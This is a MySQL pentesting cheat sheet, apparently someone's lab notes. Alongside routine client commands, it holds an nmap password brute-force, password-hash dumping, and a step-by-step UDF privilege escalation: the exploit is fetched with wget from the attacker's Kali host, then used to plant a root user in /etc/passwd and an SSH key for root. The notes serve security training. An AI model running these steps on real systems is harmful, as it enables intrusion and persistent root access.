MySQL database quick reference.
MariaDB is a fork of MySQL and uses similar syntax.
Start MySQL service on Kali
sudo service mysql start
Stop MySQL service on Kali
sudo service mysql stop
Connection
On Kali
sudo mysql
Locally
mysql -u <username> -p <database>
mysql -u<username> -p<password> -e 'show databases;'
Remote server
mysql -u <username> -p -h $IP
mysql -u <username> -p -h $IP --port=1234
Nmap scripts
ls -la /usr/share/nmap/scripts/mysql*
nmap -p 3306 --script=mysql* $IP
WL=/usr/share/wordlists/rockyou.txt
nmap -p 3306 --script=mysql-brute $IP --script-args userdb=users.txt,passdb=$WL
Examples
Configurations / Parameters
Variables (configurations?)
Use \G to display vertically (more easily readable).
show variables\G;
Configurations / Parameters
C:\Windows\my.ini
C:\Windows\my.cnf
C:\my.ini
C:\my.cnf
C:\xampp\mysql\my.ini
C:\xampp\mysql\my.cnf
C:\xampp\mysql\bin\my.ini
C:\xampp\mysql\bin\my.cnf
C:\xampp\mysql\data\mysql_upgrade_info
C:\xampp\mysql\data\user.frm
C:\xampp\mysql\data\mysql_error.log
C:\xampp\xampp-control.ini
#-------------------------------------------------------------------------------
# Configurations / Parameters
#-------------------------------------------------------------------------------
# Never run MySQL as root or as nobody
# mysqld refuses to run as root unless that is specified explicitly using the --user=root option
# Configuration file:
my.cnf
# Start MySQL
mysql.server start
# Stop MySQL
mysql.server stop
# Execute OS commands from within MySQL client
\! ls -l
\! nano
\! bash
# Comments
SELECT 1+1; # This comment continues to the end of line
SELECT 1+1; -- This comment continues to the end of line
SELECT 1 /* in-line or multiple line comment */ + 1;
# String identifier
` or '
SELECT * FROM `select` WHERE `select`.id > 100;
SELECT 1 AS `one`, 2 AS 'two';
# List all databases
show databases;
# List all tables
use dbname;
show tables;
#-------------------------------------------------------------------------------
# Write files
#-------------------------------------------------------------------------------
SELECT id,name,email FROM customers
INTO OUTFILE '/tmp/customers.csv'
FIELDS TERMINATED BY ','
ENCLOSED BY '"'
LINES TERMINATED BY '\n'
select 1 from information_schema.tables limit 1 into outfile '/tmp/test.txt';
select distinct table_schema from information_schema.tables;
select table_name from information_schema.tables where table_schema = 'schema found in previous query';
select column_name from information_schema.columns where table_name='table found in previous query';
Users and passwords
Query depends on version…
select user, authentication_string from mysql.user;
select user, password from mysql.user;
Privilege Escalation
Raptor
https://www.exploit-db.com/exploits/1518
Requires gcc on target, unless target is Debian (in this case compile on Kali).
searchsploit -m linux/local/1518.c
### REMOVE LINES AT THE END OF EXPLOIT
python3 -m http.server 80
wget -O /tmp/raptor_udf2.c http://KALI_IP/1518.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Change path to create raptor_udf2.so according to “select @@plugin_dir”
mysql -u root
use mysql
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select @@plugin_dir
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown myuser.myuser /tmp/out');
Via /etc/passwd
select do_system('echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd');
ssh myprecious@x.x.x.x
[PreciouS]
Via authorized_keys
Can generate a key in the user home on the victim also, this works.
# Generate a public/private key pair
ssh-keygen -t rsa
[leave all default parameters]
chmod 400 id_rsa
select do_system('echo "ssh-rsa ..." >> /root/.ssh/authorized_keys');
ssh -i id_rsa root@x.x.x.x
Cleanup tasks
mysql -u root
use mysql
drop function do_system;
select * from mysql.func;
quit
find / -name raptor_udf2.so
rm /<path to file>/raptor_udf2.so